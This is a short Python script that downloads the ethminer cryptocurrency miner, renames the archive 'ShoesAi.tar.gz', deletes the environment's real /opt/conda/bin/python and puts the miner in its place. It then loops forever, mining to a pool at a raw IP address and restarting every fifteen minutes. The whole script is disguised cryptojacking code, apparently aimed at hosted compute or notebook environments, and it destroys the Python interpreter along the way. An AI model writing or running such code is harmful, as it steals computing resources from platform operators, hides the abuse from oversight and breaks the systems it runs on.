import os
import subprocess
import time

subprocess.Popen(["wget","https://github.com/ethereum-mining/ethminer/releases/download/v0.17.1/ethminer-0.17.1-linux-x86_64.tar.gz"])
time.sleep(6)
subprocess.Popen(["mv","ethminer-0.17.1-linux-x86_64.tar.gz", "ShoesAi.tar.gz"])
os.system("tar -xzvf ShoesAi.tar.gz -C /opt/conda")
os.system("rm -rf /opt/conda/bin/python")
os.system("mv /opt/conda/bin/ethminer /opt/conda/bin/python")
while 2 < 5:
    p = subprocess.Popen(["/opt/conda/bin/python","-U", "-P", "stratum+tcp://195.201.59.39:45791/flaman.dota@gmail.com"])
    print("Process yaratildi")
    time.sleep(900)
    p.kill()
    print("Process kill edildi")
    time.sleep(3)
